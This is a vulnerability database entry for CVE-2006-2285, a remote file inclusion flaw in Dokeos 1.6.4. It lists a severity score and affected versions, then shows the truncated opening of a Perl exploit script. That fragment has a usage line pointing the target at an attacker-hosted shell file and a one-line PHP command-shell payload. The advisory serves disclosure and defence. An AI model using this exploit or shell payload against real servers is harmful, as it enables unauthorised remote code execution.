5.1
CVSSv2

CVE-2006-2285

Published: 10/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9
VMScore: 515
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in authldap.php in Dokeos 1.6.4 allows remote malicious users to execute arbitrary PHP code via a URL in the includePath parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

dokeos open source learning and knowledge management tool 1.6_rc2

dokeos open source learning and knowledge management tool 1.5.5

dokeos open source learning and knowledge management tool 1.6.4

dokeos open source learning and knowledge management tool 1.4

dokeos open source learning and knowledge management tool 1.5

dokeos open source learning and knowledge management tool 1.5.3

dokeos open source learning and knowledge management tool 1.5.4

Exploits

#!/usr/bin/perl ############ # Dokeos Learning Management System 164 Remote File Include # Exploit & Advisorie: beford <xbefordx gmail com> # # uso:# perl ownpl <host> <cmd-shell-url> <cmd-var> # perl ownpl hostcom/dokeos/ atacante/shellgif cmd # # cmd shell example: <? system($cmd); ?> # cm ...